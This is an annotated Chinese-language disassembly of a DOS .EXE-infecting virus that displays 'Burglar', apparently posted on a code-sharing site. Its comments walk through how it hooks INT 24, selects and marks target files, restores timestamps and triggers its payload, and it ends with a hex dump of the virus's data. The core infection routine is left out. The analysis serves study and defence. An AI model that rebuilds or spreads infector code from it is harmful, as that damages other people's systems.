?? grave 病毒.txt
字號:
9F6A:012F 1F POP DS
9F6A:0130 9C PUSHF
9F6A:0131 B41A MOV AH,1A ;恢復原 DTA 地址
9F6A:0133 CD21 INT 21
9F6A:0135 9D POPF
9F6A:0136 5F POP DI
9F6A:0137 5E POP SI
9F6A:0138 07 POP ES
9F6A:0139 1F POP DS
9F6A:013A 5A POP DX
9F6A:013B 59 POP CX
9F6A:013C 5B POP BX
9F6A:013D 58 POP AX
9F6A:013E 2EC6067E0400 MOV Byte Ptr CS:[047E],00 ;清 DIR 傳染標志
9F6A:0144 2E803E330501 CMP Byte Ptr CS:[0533],01 ;????
9F6A:014A 7502 JNZ 014E
9F6A:014C 33DB XOR BX,BX
9F6A:014E E954FF JMP 00A5
;==================================================================
;傳染文件子程序
9F6A:0151 8BF2 MOV SI,DX
9F6A:0153 2E89162505 MOV CS:[0525],DX
9F6A:0158 90 NOP ;此循環為尋找
9F6A:0159 AC LODSB ;全路徑文件名中
9F6A:015A 0AC0 OR AL,AL ;文件名的起始地址 => 0525
9F6A:015C 740F JZ 016D
9F6A:015E 3C5C CMP AL,5C ;'\'
9F6A:0160 7404 JZ 0166
9F6A:0162 3C3A CMP AL,3A ;':'
9F6A:0164 75F3 JNZ 0159
9F6A:0166 2E89362505 MOV CS:[0525],SI ;0525 為文件名開始指針
9F6A:016B EBEC JMP 0159
9F6A:016D 80FC4B CMP AH,4B ;執行文件轉 0182
9F6A:0170 90 NOP ;
9F6A:0171 740F JZ 0182 ;
9F6A:0173 817CFB2E45 CMP Word Ptr [SI-05],452E ; "E."
9F6A:0178 7507 JNZ 0181
9F6A:017A 817CFD5845 CMP Word Ptr [SI-03],4558 ; "EX"
9F6A:017F 7401 JZ 0182 ;擴展名是 .EXE 轉傳染
9F6A:0181 C3 RET
9F6A:0182 0E PUSH CS ;判斷是否傳染文件
9F6A:0183 07 POP ES
9F6A:0184 2E8B362505 MOV SI,CS:[0525]
9F6A:0189 BF0E04 MOV DI,040E
9F6A:018C AD LODSW
9F6A:018D B90700 MOV CX,0007 ;文件名開始為
9F6A:0190 F2 REPNZ ;LC,WH,BT,-F,CW,KT
9F6A:0191 AF SCASW ;的文件不傳染
9F6A:0192 7417 JZ 01AB
9F6A:0194 2E8B362505 MOV SI,CS:[0525]
9F6A:0199 AC LODSB
9F6A:019A 3C00 CMP AL,00
9F6A:019C 740A JZ 01A8
9F6A:019E 3C56 CMP AL,56 ;文件名中包括
9F6A:01A0 7409 JZ 01AB ;V 和 S 字母的不傳染
9F6A:01A2 3C53 CMP AL,53
9F6A:01A4 7405 JZ 01AB
9F6A:01A6 EBF1 JMP 0199
9F6A:01A8 E80100 CALL 01AC ;傳染其它文件名的文件
9F6A:01AB C3 RET
;======================================================================
; 開始傳染可執行文件
;======================================================================
9F6A:01AC 8CDB MOV BX,DS ;設置新 INT 24
9F6A:01AE 33C0 XOR AX,AX ;到 CS:042B
9F6A:01B0 8ED8 MOV DS,AX
9F6A:01B2 FF369000 PUSH [0090]
9F6A:01B6 FF369200 PUSH [0092]
9F6A:01BA C70690002B04 MOV Word Ptr [0090],042B
9F6A:01C0 8C0E9200 MOV [0092],CS
9F6A:01C4 8EDB MOV DS,BX
9F6A:01C6 B84300 MOV AX,0043 ;取文件屬性
9F6A:01C9 E8E1FE CALL 00AD
9F6A:01CC 1E PUSH DS
9F6A:01CD 52 PUSH DX
9F6A:01CE 51 PUSH CX
9F6A:01CF 33C9 XOR CX,CX ;設置文件屬性
9F6A:01D1 B84301 MOV AX,0143 ;為可讀寫
9F6A:01D4 E8D6FE CALL 00AD
9F6A:01D7 7308 JNB 01E1
9F6A:01D9 2EFE063405 INC Byte Ptr CS:[0534]
9F6A:01DE EB65 JMP 0245
9F6A:01E0 90 NOP
9F6A:01E1 B83D02 MOV AX,023D ;打開文件
9F6A:01E4 E8C6FE CALL 00AD
9F6A:01E7 7309 JNB 01F2
9F6A:01E9 2EFE063405 INC Byte Ptr CS:[0534]
9F6A:01EE EB55 JMP 0245
9F6A:01F0 90 NOP
9F6A:01F1 90 NOP
9F6A:01F2 93 XCHG AX,BX
9F6A:01F3 B85700 MOV AX,0057 ;取文件時間
9F6A:01F6 E8B4FE CALL 00AD
9F6A:01F9 2E890E2905 MOV CS:[0529],CX
9F6A:01FE 52 PUSH DX
9F6A:01FF 90 NOP
9F6A:0200 0E PUSH CS
9F6A:0201 1F POP DS
9F6A:0202 0E PUSH CS
9F6A:0203 07 POP ES
9F6A:0204 B03F MOV AL,3F ;讀文件頭 66H 字節
9F6A:0206 BA7F04 MOV DX,047F ;到 047F
9F6A:0209 B96600 MOV CX,0066
9F6A:020C E89EFE CALL 00AD
9F6A:020F A17F04 MOV AX,[047F]
9F6A:0212 90 NOP
9F6A:0213 3D5A4D CMP AX,4D5A ;.EXE 文件轉 0222
9F6A:0216 90 NOP
9F6A:0217 7409 JZ 0222
9F6A:0219 3D4D5A CMP AX,5A4D
9F6A:021C 90 NOP
9F6A:021D 7403 JZ 0222
9F6A:021F EB14 JMP 0235 ;非 .EXE 文件不傳染
9F6A:0221 90 NOP
;===================================================================
;傳染 .EXE 文件
9F6A:0222 A09304 MOV AL,[0493] ;.EXE 文件傳染標志
9F6A:0225 3478 XOR AL,78 ;文件頭中 IP xor CRC = 78
9F6A:0227 38069104 CMP [0491],AL
9F6A:022B 7408 JZ 0235 ;未傳染轉 025D
9F6A:022D EB2E JMP 025D
9F6A:022F 90 NOP ;傳染成功設置傳染標志
9F6A:0230 830E29051D OR Word Ptr [0529],+1D ;時間設置為 1D
9F6A:0235 5A POP DX
9F6A:0236 8B0E2905 MOV CX,[0529]
9F6A:023A B85701 MOV AX,0157 ;恢復文件時間
9F6A:023D E86DFE CALL 00AD
9F6A:0240 B03E MOV AL,3E ;關閉文件
9F6A:0242 E868FE CALL 00AD
9F6A:0245 B84301 MOV AX,0143 ;恢復文件屬性
9F6A:0248 59 POP CX
9F6A:0249 5A POP DX
9F6A:024A 1F POP DS
9F6A:024B E85FFE CALL 00AD
9F6A:024E 33C0 XOR AX,AX ;恢復原 INT 24
9F6A:0250 8ED8 MOV DS,AX
9F6A:0252 8F069200 POP [0092]
9F6A:0256 8F069000 POP [0090]
9F6A:025A 0E PUSH CS
9F6A:025B 1F POP DS
9F6A:025C C3 RET
;======================================================================
;開始傳染 .EXE 文件
9F6A:025D BE7F04 MOV SI,047F ;SI 指向文件頭
9F6A:0260 90 NOP
9F6A:0261 C70627050000 MOV Word Ptr [0527],0000
9F6A:0267 8B543C MOV DX,[SI+3C] ;取 NE 文件頭偏移
9F6A:026A 8B4C3E MOV CX,[SI+3E]
9F6A:026D B80042 MOV AX,4200
9F6A:0270 CD21 INT 21
9F6A:0272 B90200 MOV CX,0002 ;讀出 NE 文件頭 2 字節
9F6A:0275 BA2705 MOV DX,0527
9F6A:0278 B43F MOV AH,3F
9F6A:027A CD21 INT 21
9F6A:027C 813E27054E45 CMP Word Ptr [0527],454E
9F6A:0282 7502 JNZ 0286 ;是 "NE" 新格式文件
9F6A:0284 EBAF JMP 0235 ;不傳染
9F6A:0286 B002 MOV AL,02 ;4202 功能
9F6A:0288 E8C900 CALL 0354 ;取文件長度
9F6A:028B 83FA06 CMP DX,+06 ;> 393216 字節不傳染
9F6A:028E 77A5 JA 0235
9F6A:0290 0BD2 OR DX,DX
9F6A:0292 7507 JNZ 029B
9F6A:0294 3D0001 CMP AX,0100 ;< 256 字節不傳染
9F6A:0297 7702 JA 029B
9F6A:0299 EB9A JMP 0235
9F6A:029B 52 PUSH DX
9F6A:029C 50 PUSH AX
9F6A:029D 8B4404 MOV AX,[SI+04]
9F6A:02A0 8B7C02 MOV DI,[SI+02]
9F6A:02A3 0BFF OR DI,DI
9F6A:02A5 7401 JZ 02A8
9F6A:02A7 48 DEC AX
9F6A:02A8 B90002 MOV CX,0200
9F6A:02AB F7E1 MUL CX
9F6A:02AD 03C7 ADD AX,DI
9F6A:02AF 83D200 ADC DX,+00
9F6A:02B2 5F POP DI
9F6A:02B3 3BF8 CMP DI,AX ;如果文件有覆蓋部分
9F6A:02B5 5F POP DI ;不傳染
9F6A:02B6 75E1 JNZ 0299
9F6A:02B8 3BFA CMP DI,DX
9F6A:02BA 75DD JNZ 0299
...
;以下病毒具體傳染文件的代碼不是本文討論的對象,故略去
...
;在傳染完成后,病毒轉發作部分,此病毒的發作是非惡性的
9F6A:0329 B42C MOV AH,2C ;取系統時間
9F6A:032B CD21 INT 21
9F6A:032D 80F90E CMP CL,0E ;分鐘數為 14 則發作
9F6A:0330 751F JNZ 0351
9F6A:0332 BE1E04 MOV SI,041E ;在屏幕左上角
9F6A:0335 B800B8 MOV AX,B800 ;打印 Burglar 字樣
9F6A:0338 8ED8 MOV DS,AX
9F6A:033A 33FF XOR DI,DI
9F6A:033C B90900 MOV CX,0009
9F6A:033F 2E8A04 MOV AL,CS:[SI]
9F6A:0342 46 INC SI
9F6A:0343 8805 MOV [DI],AL
9F6A:0345 47 INC DI ;屬性為加亮閃爍
9F6A:0346 C6058F MOV Byte Ptr [DI],8F
9F6A:0349 47 INC DI
9F6A:034A E2F3 LOOP 033F
9F6A:034C B97777 MOV CX,7777 ;延時
9F6A:034F E2FE LOOP 034F
9F6A:0351 E9DCFE JMP 0230
;===================================================================
;移動文件指針子程序
9F6A:0354 33C9 XOR CX,CX
9F6A:0356 33D2 XOR DX,DX
9F6A:0358 B442 MOV AH,42
9F6A:035A CD21 INT 21
9F6A:035C C3 RET
9F6A:0402 90 BC 06 81 01 9C-88 01 01 01 01 E7 43 4C .<.........gCL
9F6A:0410 48 57 54 42 46 2D 57 43-54 4B 00 00 00 00 42 75 HWTBF-WCTK....Bu
9F6A:0420 72 67 6C 61 72 2F 48 2A-2E 2A 00 32 C0 CF 00 00 rglar/H*.*.2@O..
9F6A:0430 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0440 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0450 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0460 00 00 00 00 78 F0 00 00-19 04 0C 00 00 00 BC 15 ....xp........<.
9F6A:0470 BC 15 06 70 A3 10 78 03-8A 17 65 0F 05 00 00
9F6A:047F 4D <..p#.x...e....M
9F6A:0480 5A C4 01 28 00 00 00 02-00 3D 0B FF FF B2 04 84 ZD.(.....=...2..
9F6A:0490 04 7E 89 06 00 B2 04 1C-00 00 00 64 69 65 74 F9 .~...2.....diety
9F6A:04A0 9C EB 09 69 42 0A 00 A8-B8 55 F8 9C 06 1E 57 56 .k.iB..(8Ux...WV
9F6A:04B0 52 51 53 50 0E FC 8C C8-BA 52 07 03 D0 52 BA 79 RQSP.|.H:R..PR:y
9F6A:04C0 06 52 BA BC 04 03 C2 8B-D8 05 0E 03 8E DB 8E C0 .R:<..B.X....[.@
9F6A:04D0 33 F6 33 FF B9 08 00 F3-A5 4B 48 4A 79 EE 8E C3 3v3.9..s%KHJyn.C
9F6A:04E0 8E D8 BE 67 00 .X>g.
9F6A:04E5 01 3F 3F-3F 3F 3F 3F 3F 3F 3F 3F .??????????
9F6A:04F0 3F 27 0D 00 00 00 12 E0-1E 00 20 FA 99 27 21 67 ?'.....`.. z.'!g
9F6A:0500 59 00 00 56 49 52 2E 4C-53 54 00 45 00 00 00 00 Y..VIR.LST.E....
9F6A:0510 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0520 00 00 00 00 00 38 05 00-00 7D 97 00 00 00 00 80 .....8...}......
9F6A:0530 00 6F 18 00 03 00 00 00-00 00 00 00 00 00 00 00 .o..............
9F6A:0540 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -